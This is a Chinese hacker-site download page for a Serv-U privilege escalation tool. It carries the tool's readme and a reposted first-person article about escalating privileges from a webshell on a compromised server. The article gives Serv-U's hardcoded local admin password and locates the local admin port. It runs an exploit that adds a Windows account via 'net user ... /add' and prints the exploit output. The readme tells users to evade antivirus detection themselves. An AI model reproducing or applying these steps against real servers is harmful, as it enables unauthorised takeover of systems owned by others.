文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  新闻资讯 | 安全公告 | 技术文摘 | 软件下载 | 动画教程 | 黑客文学 | 骗术揭秘 | 激励人生               建站于2004年10月
 当前位置:主页 > 黑客软件 > 入侵攻击 > 下载详细   您对新版的建议
Serv-U提权综合工具 by 执着我一生[F.S.T]
  • 软件属性:  免费软件
  • 文件大小:  617K
  • 软件语言:  简体中文
  • 评分等级:  ☆☆☆☆☆
  • 更新时间:  2007-07-12
  • 软件编辑:  孤剑飘摇
  • 解压密码:  www.hx99.net
  • 下载次数:   次
资源描述


    1.生成的文件都和本程序在同一目录下。[被杀自己想办法:)]
   
    2.口令读取的方法比较笨,要和版本正确对应,否则读不出来。目前支持的版本还不全。
   
    3.使用过程中,如果你发现什么Bug或是有好的建议请与我联系。不胜感激!

    4.开发环境:VC6.0sp6 + XPSP2 

      用ASProtect加壳 

      文件md5校验值:5377a1ae7994a100d8207a833cfa8542
   
    ps:感谢狗剩兄弟的无私帮助!!![告诉我动态定位读取口令的方法,本人不才,还不能

        完美实现,目前还在改进中:)]

=============
    声明
=============

    1.本软件仅供技术研究,请不要用于非法用途.对使用本软件造成的任何后果作者一概不负责!

    2.本软件为免费软件,您可以随意使用但请不要对软件进行更改,传播过程中也请您保持软件的完整性.版权归原作者执着我一生[F.S.T]所有.

=============
   联系方式
=============

    My Blog:  http://www.allife.org

    Email  :  elong2008@126.com

    QQ     :  61006284

    欢迎访问火狐技术联盟     http://www.wrsky.com
   
=============
    最后
=============

    附上网上一篇关于Serv-U的文章,作者不是我。

                            对Serv-U 6.0.0.2默认帐户及密码的一点理解

   今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini 
[GLOBAL] 
Version=6.0.0.2 
OpenFilesDownloadMode=Exclusive 
PacketTimeOut=300 
LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39 

6.0.0.2版的.曾经看到哪说6.0版的默认本地管理帐号和密码依旧是原来那个.可又好像听谁说过6版的密码已经改了.. 

呵.这里发现.多出了一行Localsetuppassword.有种不详的预感.难道原来的默认密码已经通过它来设置了?加了MD5,算算纯数字倒还是可以.机会渺茫.. 

试试能不能写入...显示权限不足(一切都在预料之内).OK试试默认帐户和密码吧. 

上传了xiaolu的那个serv-u权限提升工具 

netstat -an |find "43958" 
TCP    127.0.0.1:43958        0.0.0.0:0              LISTENING 

嗯,是这个口. 

执行命令 

D:\web\www\XXXX_com\serv-u.exe 43958 "net user xiaoqi amen. /add "  
****************************************************** 
Serv-u <3.x Local Exploit by xiaolu 
>221 Serv-U FTP Server v6.0 for WinSock ready... 
>331 User name okay, need password. 
****************************************************** 
#l@$ak#.lk;0@P 
>530 Not logged in. 
****************************************************** 

看到530,心凉了一下,这么说来默认密码被改了. 
上群里想获得一下确认.Superhei给了个很好的思路.下载主程序用UEDIT查看密码. 
serv-u 6.0版之前要修改默认密码也是同样的方法,而且密码长度要求同样要求是14位(用其他字符替换#l@$ak#.lk;0@P).. 
打开ServUAdmin.exe查了下,发现密码依旧是#l@$ak#.lk;0@P(特地复制到记事本观察,防止0/O l/1等字符混淆).确实没有变. 
那么,看来Serv-u已经不依靠它来验证了? 
为了找出真像.下载了一个Serv-U 6.0.0.2版(未装汉化,未破解,防止低版本汉化及破解补丁) 


之前就在想,为什么Serv-U不可以提供一个让管理员修改密码的地方了?多少个服务器OVER的责任在Serv-U上啊? 
好!这次来了,刚打开serv-u admin,发现在"停止服务"下面多了一个"设置更改密码"的按钮. 
再来看看ServUDaemon.ini,除了版本改变了以外,与原来并没有不同之处. 
回到控制台点开"设置更改密码"要求输入旧密码,新密码,确认.旧密码?旧密码是什么?#l@$ak#.lk;0@P吗? 
提示密码不正确..怪了.试了下空密码...正确..这可把我郁闷了.难道在Serv-U 6.0.0.2里LocalAdministrator的密码就是空??? 
把xiaolu的权限提升工具拿来改了下,把密码改成空.编译好重新传了上去. 

执行命令 

D:\web\www\XXXX_com\serv-u2.exe 43958 "net user xiaoqi amen. /add "  
****************************************************** 
Serv-u <3.x Local Exploit by xiaolu 
>221 Serv-U FTP Server v6.0 for WinSock ready... 
>331 User name okay, need password. 
****************************************************** 
>530 Not logged in. 
****************************************************** 

依然是530.呵..真是在做梦啊我.不过这次失败并不能代表默认密码不为空(因为这台机器的配置文件中有LocalSetupPassword=) 
好的.回过头,看了下我机器上的ServUDaemon.ini,果然多了一行Localsetuppassword=xxxxxxx,看来确是刚才配置密码的MD5了.把我机器上Serv-u的密码改成空的(竟然允许我空的)再用这个serv-u2.exe试了下.不行..530,脑中突然闪过,难道"空"就是#l@$ak#.lk;0@P 
操起serv-u.exe,yeah!成功. 
到这里我们要开始怀疑一个问题了,如果修改了密码,那么就需要进行二次验证了?一次是#l@$ak#.lk;0@P 一次是修改完的密码. 
呵..兴冲冲地跟superhei说了句"二次验证",修改了下那个权限提升工具,把其中的密码改为我在Serv-U中设置的密码,连上了.证明了没有进行二次验证. 
总结一下,在Serv-U 6.0.0.2版本中,初始密码依旧是#l@$ak#.lk;0@P 但可以很方便地在Serv-U admin控制台修改密码,修改完密码,配置保存在ServUDaemon.ini的LocalSetupPassword=中. 
原来的#l@$ak#.lk;0@P依旧保存只有当密码为空时使用. 

另:要修改本地管理端口.只需要在ServUDaemon.ini中的[global]里加上一行LocalSetupPortNo=端口号,既可 

btw: 这些没有技术含量的东西,希望大家多多原谅,原本写的一些东西只是想丢在blog里自己安慰安慰,大家转载完实在是折煞我了.

相关下载
QQ好友密探2008(Av0day绿色修正
ECShop漏洞利用工具
Flash 0day 生成器
黑客必备 SocksCap
动网php2.0爆密码工具
 
下载排行
推荐下载
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号